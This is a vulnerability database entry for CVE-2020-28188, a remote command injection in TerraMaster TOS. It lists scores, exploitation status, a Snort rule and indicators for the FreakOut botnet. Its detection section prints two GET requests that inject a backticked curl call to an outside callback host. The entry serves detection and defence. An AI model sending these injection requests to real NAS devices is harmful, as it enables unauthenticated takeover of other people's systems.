cbcvebase.
CVE-2020-28188
published 2020-12-24

CVE-2020-28188: Remote Command Execution (RCE) vulnerability in TerraMaster TOS <= 4.2.06 allow remote unauthenticated attackers to inject OS commands via /include/makecvs.php…

PriorityP195critical9.8CVSS 3.1
AVNACLPRNUINSUCHIHAH
ITWEXPLOITVulnCheck KEVRansomware
Exploited in the wild
EPSS
96.60%
99.9th percentile
Remote Command Execution (RCE) vulnerability in TerraMaster TOS <= 4.2.06 allow remote unauthenticated attackers to inject OS commands via /include/makecvs.php in Event parameter.

Affected

1 ranges
VendorProductVersion rangeFixed in
terra-mastertos<= 4.2.06

Detection & IOCsextracted from sources · hover to see the quote

path/include/makecvs.php
commandGET /include/makecvs.php?Event=%60curl+http%3a//{{interactsh-url}}+-H+'User-Agent%3a+{{useragent}}'%60 HTTP/1.1
commandGET /tos/index.php?explorer/pathList&path=%60curl+http%3a//{{interactsh-url}}+-H+'User-Agent%3a+{{useragent}}'%60 HTTP/1.1
path/tos/index.php?explorer/pathList
snort
alert http any any -> [$HOME_NET,$HTTP_SERVERS] any (msg:"ET EXPLOIT Possible TerraMaster TOS RCE Inbound (CVE-2020-28188 CVE-2020-35665)"; flow:established,to_server; http.method; content:"GET"; http.uri; content:"/makecvs.php?Event="; fast_pattern; pcre:"/(?:[\x60\x3b\x7c]|%60|%3b|%7c|%26|(?:\x3c\x3e\x24]|%3c|%3e|%24)(?:\x28|%28))/R"; http.uri.raw; content:"%20"; reference:url,research.checkpoint.com/2021/freakout-leveraging-newest-vulnerabilities-for-creating-a-botnet/; reference:cve,2020-28188; reference:cve,2020-35665; classtype:attempted-admin; sid:2031535; rev:3; metadata:attack_target Server, created_at 2021_01_21, cve CVE_2020_28188, deployment Perimeter, deployment Internal, performance_impact Low, confidence Medium, signature_severity Major, tag Description_Generated_By_Proofpoint_Nexus, updated_at 2021_11_18;)
  • The malware achieves persistence by adding itself to rc.local — monitor writes to /etc/rc.local or rc.local for unexpected entries.
  • The Nuclei template uses OAST/interactsh callback detection: a successful HTTP interaction with the User-Agent header matching the random base string confirms exploitation.
  • C2 traffic to gxbrowser[.]net on IRC — the botnet communicates via IRC with hardcoded, obfuscated credentials; all C2 addresses are hardcoded in the script.
  • ·The malware (out.py) is polymorphic and re-obfuscated on every download — function names and variable names change each time, making static hash-based detection unreliable.
  • ·The Snort/ET rule (sid:2031535) also covers CVE-2020-35665 (a related TerraMaster endpoint) — detections firing on this rule may relate to either CVE, requiring URI inspection to distinguish.

CVSS provenance

nvdv3.19.8CRITICALCVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
nvdv2.010.0CRITICALAV:N/AC:L/Au:N/C:C/I:C/A:C
vulncheck9.8CRITICAL
CVEs like this are exactly what “Exploited This Week” covers.

Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.